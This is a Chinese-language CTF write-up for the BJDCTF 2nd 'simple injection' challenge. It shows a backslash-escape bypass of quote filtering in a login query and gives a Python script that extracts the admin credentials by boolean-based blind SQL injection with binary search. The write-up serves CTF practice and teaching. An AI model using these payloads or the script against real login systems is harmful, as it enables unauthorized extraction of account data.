[BJDCTF 2nd]简单注入

访问robots.txt,得到hint.php,得到sql注入的源码

select * from users where username='$_POST["username"]' and password='$_POST["password"]';

一开始尝试了一些'闭合
okkk!'被过滤了
那就从这个sql语句入手想想办法
记得以前学过一个addslashes()函数利用\去转义,看看效果

select * from users where username='123\' and password='union select 1,2,3#';

okkkk! union 这些应该也被过滤了
尝试一下or 这个时候语句就是

select * from users where username='123\' and password='or 1#';

页面返回BJD needs to be stronger
这样看来应该就是注入成功了比较简单的注入题目了
直接写脚本

import requests
import time

url = "http://28c73fa1-00c6-4fe9-a54a-08730ca346ad.node3.buuoj.cn/"

def Get_Flag(url):
    Flag = ""
    for i in range(1,30):
        Max = 128
        Min = 32
        Mid = (Max+Min)//2
        while Min < Max:
            time.sleep(0.5)
        #   payload = "or ascii(substr(database(),%d,1))>%d#"%(i,Mid)
            payload = 'or ascii(substr((username),{},1))>{}#'.format(i,Mid)
        #   payload = 'or ascii(substr((password),{},1))>{}#'.format(i,Mid)
            data = {
    
    "username":"123\\","password":payload}
            r = requests.post(url=url,data=data)
            if "stronger" in r.text:
                Min=Mid+1
                pass
            else:
                Max=Mid
                pass
            Mid = (Max+Min)//2
        if (Min==32 or Max==128):
            print('break')
            break
        Flag = Flag + chr(Mid)
        print(Flag)

Get_Flag(url)

用户名admin
得到flag
吐槽一下我没fuzz代码写完才发现=后也被过滤了下次一定要注意

[BJDCTF 2nd]简单注入

猜你喜欢